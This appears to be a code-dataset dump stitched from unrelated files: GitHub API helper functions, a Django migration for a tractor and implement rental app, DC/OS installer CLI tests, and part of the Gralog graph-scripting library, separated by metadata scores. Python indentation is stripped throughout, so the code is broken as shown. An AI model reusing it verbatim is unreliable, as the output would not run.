watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| en | 0.695324 | Utilities for interacting with GitHub Authorize a user for GHub Keyword arguments: ghub -- the ghub object that needs authorization reauthorize -- performs authorization again (default False) | 2.633576 | 3 |
equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | 0 | 8003 | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. <NAME> 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use a SI units of gpm or psi', max_length=100, verbose_name='Hydaulic capacity (gallon per minutes(gpm) or psi-pound per square inchies)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is Hydaulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. <NAME> 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use a SI units of gpm or psi', max_length=100, verbose_name='Hydaulic capacity (gallon per minutes(gpm) or psi-pound per square inchies)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is Hydaulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| en | 0.795899 | # Generated by Django 3.0.7 on 2020-09-18 05:52 | 1.751481 | 2 |
dcos_installer/test_cli.py | nkhanal0/dcos | 3 | 8004 | import pytest
import gen
from dcos_installer import cli
def test_default_arg_parser():
parser = cli.get_argument_parser().parse_args([])
assert parser.verbose is False
assert parser.port == 9000
assert parser.action == 'genconf'
def test_set_arg_parser():
argument_parser = cli.get_argument_parser()
def parse_args(arg_list):
return argument_parser.parse_args(arg_list)
parser = parse_args(['-v', '-p 12345'])
assert parser.verbose is True
assert parser.port == 12345
parser = parse_args(['--web'])
assert parser.action == 'web'
parser = parse_args(['--genconf'])
assert parser.action == 'genconf'
parser = parse_args(['--preflight'])
assert parser.action == 'preflight'
parser = parse_args(['--postflight'])
assert parser.action == 'postflight'
parser = parse_args(['--deploy'])
assert parser.action == 'deploy'
parser = parse_args(['--validate-config'])
assert parser.action == 'validate-config'
parser = parse_args(['--hash-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'hash-password'
parser = parse_args(['--hash-password'])
assert parser.password is None
assert parser.action == 'hash-password'
parser = parse_args(['--set-superuser-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'set-superuser-password'
parser = parse_args(['--set-superuser-password'])
assert parser.password is None
assert parser.action == 'set-superuser-password'
parser = parse_args(['--generate-node-upgrade-script', 'fake'])
assert parser.installed_cluster_version == 'fake'
assert parser.action == 'generate-node-upgrade-script'
# Can't do two at once
with pytest.raises(SystemExit):
parse_args(['--validate', '--hash-password', 'foo'])
def test_stringify_config():
stringify = gen.stringify_configuration
# Basic cases pass right through
assert dict() == stringify(dict())
assert {"foo": "bar"} == stringify({"foo": "bar"})
assert {"a": "b", "c": "d"} == stringify({"a": "b", "c": "d"})
# booleans are converted to lower case true / false
assert {"a": "true"} == stringify({"a": True})
assert {"a": "false"} == stringify({"a": False})
assert {"a": "b", "c": "false"} == stringify({"a": "b", "c": False})
# integers are made into strings
assert {"a": "1"} == stringify({"a": 1})
assert {"a": "4123"} == stringify({"a": 4123})
assert {"a": "b", "c": "9999"} == stringify({"a": "b", "c": 9999})
# Dict and list are converted to JSON
assert {"a": '["b"]'} == stringify({"a": ['b']})
assert {"a": '["b\\"a"]'} == stringify({"a": ['b"a']})
assert {"a": '[1]'} == stringify({"a": [1]})
assert {"a": '[1, 2, 3, 4]'} == stringify({"a": [1, 2, 3, 4]})
assert {"a": '[true, false]'} == stringify({"a": [True, False]})
assert {"a": '{"b": "c"}'} == stringify({"a": {"b": "c"}})
assert {"a": '{"b": 1}'} == stringify({"a": {"b": 1}})
assert {"a": '{"b": true}'} == stringify({"a": {"b": True}})
assert {"a": '{"b": null}'} == stringify({"a": {"b": None}})
# Random types produce an error.
with pytest.raises(Exception):
stringify({"a": set()})
# All the handled types at once
assert {
"a": "b",
"c": "true",
"d": "1",
"e": "[1]",
"f": '{"g": "h"}'
} == stringify({"a": "b", "c": True, "d": 1, "e": [1], "f": {"g": "h"}})
| import pytest
import gen
from dcos_installer import cli
def test_default_arg_parser():
parser = cli.get_argument_parser().parse_args([])
assert parser.verbose is False
assert parser.port == 9000
assert parser.action == 'genconf'
def test_set_arg_parser():
argument_parser = cli.get_argument_parser()
def parse_args(arg_list):
return argument_parser.parse_args(arg_list)
parser = parse_args(['-v', '-p 12345'])
assert parser.verbose is True
assert parser.port == 12345
parser = parse_args(['--web'])
assert parser.action == 'web'
parser = parse_args(['--genconf'])
assert parser.action == 'genconf'
parser = parse_args(['--preflight'])
assert parser.action == 'preflight'
parser = parse_args(['--postflight'])
assert parser.action == 'postflight'
parser = parse_args(['--deploy'])
assert parser.action == 'deploy'
parser = parse_args(['--validate-config'])
assert parser.action == 'validate-config'
parser = parse_args(['--hash-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'hash-password'
parser = parse_args(['--hash-password'])
assert parser.password is None
assert parser.action == 'hash-password'
parser = parse_args(['--set-superuser-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'set-superuser-password'
parser = parse_args(['--set-superuser-password'])
assert parser.password is None
assert parser.action == 'set-superuser-password'
parser = parse_args(['--generate-node-upgrade-script', 'fake'])
assert parser.installed_cluster_version == 'fake'
assert parser.action == 'generate-node-upgrade-script'
# Can't do two at once
with pytest.raises(SystemExit):
parse_args(['--validate', '--hash-password', 'foo'])
def test_stringify_config():
stringify = gen.stringify_configuration
# Basic cases pass right through
assert dict() == stringify(dict())
assert {"foo": "bar"} == stringify({"foo": "bar"})
assert {"a": "b", "c": "d"} == stringify({"a": "b", "c": "d"})
# booleans are converted to lower case true / false
assert {"a": "true"} == stringify({"a": True})
assert {"a": "false"} == stringify({"a": False})
assert {"a": "b", "c": "false"} == stringify({"a": "b", "c": False})
# integers are made into strings
assert {"a": "1"} == stringify({"a": 1})
assert {"a": "4123"} == stringify({"a": 4123})
assert {"a": "b", "c": "9999"} == stringify({"a": "b", "c": 9999})
# Dict and list are converted to JSON
assert {"a": '["b"]'} == stringify({"a": ['b']})
assert {"a": '["b\\"a"]'} == stringify({"a": ['b"a']})
assert {"a": '[1]'} == stringify({"a": [1]})
assert {"a": '[1, 2, 3, 4]'} == stringify({"a": [1, 2, 3, 4]})
assert {"a": '[true, false]'} == stringify({"a": [True, False]})
assert {"a": '{"b": "c"}'} == stringify({"a": {"b": "c"}})
assert {"a": '{"b": 1}'} == stringify({"a": {"b": 1}})
assert {"a": '{"b": true}'} == stringify({"a": {"b": True}})
assert {"a": '{"b": null}'} == stringify({"a": {"b": None}})
# Random types produce an error.
with pytest.raises(Exception):
stringify({"a": set()})
# All the handled types at once
assert {
"a": "b",
"c": "true",
"d": "1",
"e": "[1]",
"f": '{"g": "h"}'
} == stringify({"a": "b", "c": True, "d": 1, "e": [1], "f": {"g": "h"}})
| en | 0.880411 | # Can't do two at once # Basic cases pass right through # booleans are converted to lower case true / false # integers are made into strings # Dict and list are converted to JSON # Random types produce an error. # All the handled types at once | 2.440561 | 2 |
gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 12 | 8005 | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python???
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
v = self.getId()
v_str = str(v)
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
